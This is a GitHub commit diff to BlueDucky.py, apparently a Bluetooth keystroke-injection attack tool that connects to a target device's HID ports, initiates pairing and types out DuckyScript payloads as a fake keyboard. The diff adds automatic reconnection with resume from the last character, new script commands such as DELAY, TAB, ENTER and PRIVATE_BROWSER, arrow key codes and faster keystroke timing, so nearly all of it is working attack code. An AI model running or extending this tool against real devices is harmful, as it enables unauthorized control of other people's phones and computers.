Update BlueDucky.py

This commit is contained in:
Opabinia 2024-01-19 20:39:59 +13:00 committed by GitHub
parent 6b45afb8db
commit 495442ed7e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 198 additions and 102 deletions

View File

@ -6,6 +6,7 @@ import time
from multiprocessing import Process from multiprocessing import Process
from pydbus import SystemBus from pydbus import SystemBus
from enum import Enum from enum import Enum
import datetime
from utils.menu_functions import (main_menu, read_duckyscript, from utils.menu_functions import (main_menu, read_duckyscript,
run, restart_bluetooth_daemon, get_target_address) run, restart_bluetooth_daemon, get_target_address)
@ -117,6 +118,14 @@ class L2CAPConnectionManager:
for client in self.clients.values(): for client in self.clients.values():
client.close() client.close()
# Custom exception to handle reconnection
class ReconnectionRequiredException(Exception):
def __init__(self, message, current_line=0, current_position=0):
super().__init__(message)
time.sleep(2)
self.current_line = current_line
self.current_position = current_position
class L2CAPClient: class L2CAPClient:
def __init__(self, addr, port): def __init__(self, addr, port):
self.addr = addr self.addr = addr
@ -143,31 +152,41 @@ class L2CAPClient:
self.connected = False self.connected = False
self.sock = None self.sock = None
def reconnect(self):
# Notify the main script or trigger a reconnection process
raise ReconnectionRequiredException("Reconnection required")
def send(self, data): def send(self, data):
if not self.connected: if not self.connected:
log.error("[TX] Not connected") log.error("[TX] Not connected")
return self.reconnect()
log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") # Get the current timestamp
if self.attempt_send(data, 0.001): timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
# Add the timestamp to your log message
log.debug(f"[{timestamp}][TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}")
try:
self.attempt_send(data)
log.debug(f"[TX-{self.port}] Data sent successfully") log.debug(f"[TX-{self.port}] Data sent successfully")
else: except bluetooth.btcommon.BluetoothError as ex:
log.error(f"[TX-{self.port}] ERROR! Timed out sending data") log.error(f"[TX-{self.port}] Bluetooth error: {ex}")
self.reconnect()
self.send(data) # Retry sending after reconnection
except Exception as ex:
log.error(f"[TX-{self.port}] Exception: {ex}")
raise
def attempt_send(self, data, timeout): def attempt_send(self, data, timeout=0.5):
start = time.time() start = time.time()
while time.time() - start < timeout: while time.time() - start < timeout:
try: try:
self.sock.send(data) self.sock.send(data)
return True return
except bluetooth.btcommon.BluetoothError as ex: except bluetooth.btcommon.BluetoothError as ex:
if ex.errno != 11: # no data available if ex.errno != 11: # no data available
raise ex raise
time.sleep(0.001) time.sleep(0.001)
except Exception as ex:
log.error(f"[TX-{self.port}] Exception: {ex}")
self.connected = False
return False
def recv(self, timeout=0): def recv(self, timeout=0):
start = time.time() start = time.time()
@ -212,7 +231,7 @@ class L2CAPClient:
def send_keyboard_report(self, *args): def send_keyboard_report(self, *args):
self.send(self.encode_keyboard_input(*args)) self.send(self.encode_keyboard_input(*args))
def send_keypress(self, *args, delay=0.01): def send_keypress(self, *args, delay=0.004):
if args: if args:
log.debug(f"Attempting to send... {args}") log.debug(f"Attempting to send... {args}")
self.send(self.encode_keyboard_input(*args)) self.send(self.encode_keyboard_input(*args))
@ -220,8 +239,10 @@ class L2CAPClient:
# If no arguments, send an empty report to release keys # If no arguments, send an empty report to release keys
self.send(self.encode_keyboard_input()) self.send(self.encode_keyboard_input())
time.sleep(delay) time.sleep(delay)
# Update current_position here after successful send
return True # Indicate successful send
def send_keyboard_combination(self, modifier, key, delay=0.01): def send_keyboard_combination(self, modifier, key, delay=0.004):
# Press the combination # Press the combination
press_report = self.encode_keyboard_input(modifier, key) press_report = self.encode_keyboard_input(modifier, key)
self.send(press_report) self.send(press_report)
@ -232,85 +253,144 @@ class L2CAPClient:
self.send(release_report) self.send(release_report)
time.sleep(delay) time.sleep(delay)
def process_duckyscript(client, duckyscript): def process_duckyscript(client, duckyscript, current_line=0, current_position=0):
client.send_keypress('') # Send empty report client.send_keypress('') # Send empty report to ensure a clean start
time.sleep(0.5) time.sleep(0.5)
shift_required_characters = "!@#$%^&*()_+{}|:\"<>?ABCDEFGHIJKLMNOPQRSTUVWXYZ" shift_required_characters = "!@#$%^&*()_+{}|:\"<>?ABCDEFGHIJKLMNOPQRSTUVWXYZ"
for line in duckyscript: try:
line = line.strip() for line_number, line in enumerate(duckyscript):
if not line or line.startswith("REM"): if line_number < current_line:
continue continue # Skip already processed lines
if line.startswith("STRING"): if line_number == current_line and current_position > 0:
text = line[7:] line = line[current_position:] # Resume from the last position within the current line
for char in text:
try:
if char.isdigit():
key_code = getattr(Key_Codes, f"_{char}")
client.send_keypress(key_code)
elif char == " ":
client.send_keypress(Key_Codes.SPACE)
elif char == "[":
client.send_keypress(Key_Codes.LEFTBRACE)
elif char == "]":
client.send_keypress(Key_Codes.RIGHTBRACE)
elif char == ";":
client.send_keypress(Key_Codes.SEMICOLON)
elif char == "'":
client.send_keypress(Key_Codes.QUOTE)
elif char == "/":
client.send_keypress(Key_Codes.SLASH)
elif char == ".":
client.send_keypress(Key_Codes.DOT)
elif char == ",":
client.send_keypress(Key_Codes.COMMA)
elif char == "|":
client.send_keypress(Key_Codes.PIPE)
elif char == "-":
client.send_keypress(Key_Codes.MINUS)
elif char == "=":
client.send_keypress(Key_Codes.EQUAL)
elif char in shift_required_characters:
key_code_str = char_to_key_code(char)
if key_code_str:
key_code = getattr(Key_Codes, key_code_str)
client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code)
else:
log.warning(f"Unsupported character '{char}' in Duckyscript")
elif char.isalpha():
key_code = getattr(Key_Codes, char.lower())
if char.isupper():
client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code)
else:
client.send_keypress(key_code)
else:
key_code = char_to_key_code(char)
if key_code:
client.send_keypress(key_code)
else:
log.warning(f"Unsupported character '{char}' in Duckyscript")
client.send_keypress() # Release after each key press
except AttributeError as e:
log.warning(f"Attribute error: {e} - Unsupported character '{char}' in Duckyscript")
elif any(mod in line for mod in ["SHIFT", "ALT", "CTRL", "GUI", "COMMAND", "WINDOWS"]):
# Process modifier key combinations
components = line.split()
if len(components) == 2:
modifier, key = components
try:
# Convert to appropriate enums
modifier_enum = getattr(Modifier_Codes, modifier.upper())
key_enum = getattr(Key_Codes, key.lower())
client.send_keyboard_combination(modifier_enum, key_enum)
log.debug(f"Sent combination: {line}")
except AttributeError:
log.warning(f"Unsupported combination: {line}")
else: else:
log.warning(f"Invalid combination format: {line}") current_position = 0 # Reset position for new line
line = line.strip()
if not line or line.startswith("REM"):
continue
if line.startswith("TAB"):
client.send_keypress(Key_Codes.TAB)
if line.startswith("PRIVATE_BROWSER"):
report = bytes([0xa1, 0x01, Modifier_Codes.CTRL.value | Modifier_Codes.SHIFT.value, 0x00, Key_Codes.n.value, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
client.send(report)
# Don't forget to send a release report afterwards
release_report = bytes([0xa1, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
client.send(release_report)
if line.startswith("VOLUME_UP"):
# Send GUI + V
hid_report_gui_v = bytes.fromhex("a1010800190000000000")
client.send(hid_report_gui_v)
time.sleep(0.1) # Short delay
client.send_keypress(Key_Codes.TAB)
# Press UP while holding GUI + V
hid_report_up = bytes.fromhex("a1010800195700000000")
client.send(hid_report_up)
time.sleep(0.1) # Short delayF
# Release all keys
hid_report_release = bytes.fromhex("a1010000000000000000")
client.send(hid_report_release)
if line.startswith("DELAY"):
try:
# Extract delay time from the line
delay_time = int(line.split()[1]) # Assumes delay time is in milliseconds
time.sleep(delay_time / 1000) # Convert milliseconds to seconds for sleep
except ValueError:
log.error(f"Invalid DELAY format in line: {line}")
except IndexError:
log.error(f"DELAY command requires a time parameter in line: {line}")
continue # Move to the next line after the delay
if line.startswith("STRING"):
text = line[7:]
for char_position, char in enumerate(text, start=1):
# Process each character
try:
if char.isdigit():
key_code = getattr(Key_Codes, f"_{char}")
client.send_keypress(key_code)
elif char == " ":
client.send_keypress(Key_Codes.SPACE)
elif char == "[":
client.send_keypress(Key_Codes.LEFTBRACE)
elif char == "]":
client.send_keypress(Key_Codes.RIGHTBRACE)
elif char == ";":
client.send_keypress(Key_Codes.SEMICOLON)
elif char == "'":
client.send_keypress(Key_Codes.QUOTE)
elif char == "/":
client.send_keypress(Key_Codes.SLASH)
elif char == ".":
client.send_keypress(Key_Codes.DOT)
elif char == ",":
client.send_keypress(Key_Codes.COMMA)
elif char == "|":
client.send_keypress(Key_Codes.PIPE)
elif char == "-":
client.send_keypress(Key_Codes.MINUS)
elif char == "=":
client.send_keypress(Key_Codes.EQUAL)
elif char in shift_required_characters:
key_code_str = char_to_key_code(char)
if key_code_str:
key_code = getattr(Key_Codes, key_code_str)
client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code)
else:
log.warning(f"Unsupported character '{char}' in Duckyscript")
elif char.isalpha():
key_code = getattr(Key_Codes, char.lower())
if char.isupper():
client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code)
else:
client.send_keypress(key_code)
else:
key_code = char_to_key_code(char)
if key_code:
client.send_keypress(key_code)
else:
log.warning(f"Unsupported character '{char}' in Duckyscript")
current_position = char_position
except AttributeError as e:
log.warning(f"Attribute error: {e} - Unsupported character '{char}' in Duckyscript")
client.send_keypress() # Release after each key press
client.send_keypress()
elif any(mod in line for mod in ["SHIFT", "ALT", "CTRL", "GUI", "COMMAND", "WINDOWS"]):
# Process modifier key combinations
components = line.split()
if len(components) == 2:
modifier, key = components
try:
# Convert to appropriate enums
modifier_enum = getattr(Modifier_Codes, modifier.upper())
key_enum = getattr(Key_Codes, key.lower())
client.send_keyboard_combination(modifier_enum, key_enum)
log.debug(f"Sent combination: {line}")
except AttributeError:
log.warning(f"Unsupported combination: {line}")
else:
log.warning(f"Invalid combination format: {line}")
elif line.startswith("ENTER"):
client.send_keypress(Key_Codes.ENTER)
client.send_keypress() # Release after each key press
client.send_keypress()
# After processing each line, reset current_position to 0 and increment current_line
current_position = 0
current_line += 1
except ReconnectionRequiredException:
raise ReconnectionRequiredException("Reconnection required", current_line, current_position)
except Exception as e:
log.error(f"Error during script execution: {e}")
def char_to_key_code(char): def char_to_key_code(char):
# Mapping for special characters that always require SHIFT # Mapping for special characters that always require SHIFT
@ -429,7 +509,7 @@ class Key_Codes(Enum):
LEFTBRACE = 0x2f LEFTBRACE = 0x2f
RIGHTBRACE = 0x30 RIGHTBRACE = 0x30
CAPSLOCK = 0x39 CAPSLOCK = 0x39
VOLUME_UP = 0xed VOLUME_UP = 0x3b
VOLUME_DOWN = 0xee VOLUME_DOWN = 0xee
SEMICOLON = 0x33 SEMICOLON = 0x33
COMMA = 0x36 COMMA = 0x36
@ -442,6 +522,10 @@ class Key_Codes(Enum):
LEFT_BRACKET = 0x2f LEFT_BRACKET = 0x2f
RIGHT_BRACKET = 0x30 RIGHT_BRACKET = 0x30
DOT = 0x37 DOT = 0x37
RIGHT = 0x4f
LEFT = 0x50
DOWN = 0x51
UP = 0x52
# SHIFT KEY MAPPING # SHIFT KEY MAPPING
EXCLAMATION_MARK = 0x1e EXCLAMATION_MARK = 0x1e
@ -488,6 +572,14 @@ def establish_connections(connection_manager):
if not connection_manager.connect_all(): if not connection_manager.connect_all():
raise ConnectionFailureException("Failed to connect to all required ports") raise ConnectionFailureException("Failed to connect to all required ports")
def setup_and_connect(connection_manager, target_address):
connection_manager.create_connection(1) # SDP
connection_manager.create_connection(17) # HID Control
connection_manager.create_connection(19) # HID Interrupt
initialize_pairing('hci0', target_address)
establish_connections(connection_manager)
return connection_manager.clients[19]
# Main function # Main function
def main(): def main():
log.basicConfig(level=log.DEBUG) log.basicConfig(level=log.DEBUG)
@ -505,20 +597,24 @@ def main():
adapter = setup_bluetooth(target_address) adapter = setup_bluetooth(target_address)
adapter.enable_ssp() adapter.enable_ssp()
try: current_line = 0
connection_manager = L2CAPConnectionManager(target_address) current_position = 0
connection_manager.create_connection(1) # SDP connection_manager = L2CAPConnectionManager(target_address)
connection_manager.create_connection(17) # HID Control
connection_manager.create_connection(19) # HID Interrupt
initialize_pairing('hci0', target_address) while True:
establish_connections(connection_manager) try:
hid_interrupt_client = connection_manager.clients[19] hid_interrupt_client = setup_and_connect(connection_manager, target_address)
process_duckyscript(hid_interrupt_client, duckyscript) process_duckyscript(hid_interrupt_client, duckyscript, current_line, current_position)
except ConnectionFailureException as e: break # Exit loop if successful
log.error(f"Connection failure: {e}") except ReconnectionRequiredException as e:
terminate_child_processes() log.info("Reconnection required. Attempting to reconnect...")
sys.exit("Exiting script due to connection failure") current_line = e.current_line
current_position = e.current_position
connection_manager.close_all()
# Sleep before retrying to avoid rapid reconnection attempts
time.sleep(2)
#process_duckyscript(hid_interrupt_client, duckyscript)
if __name__ == "__main__": if __name__ == "__main__":
try: try: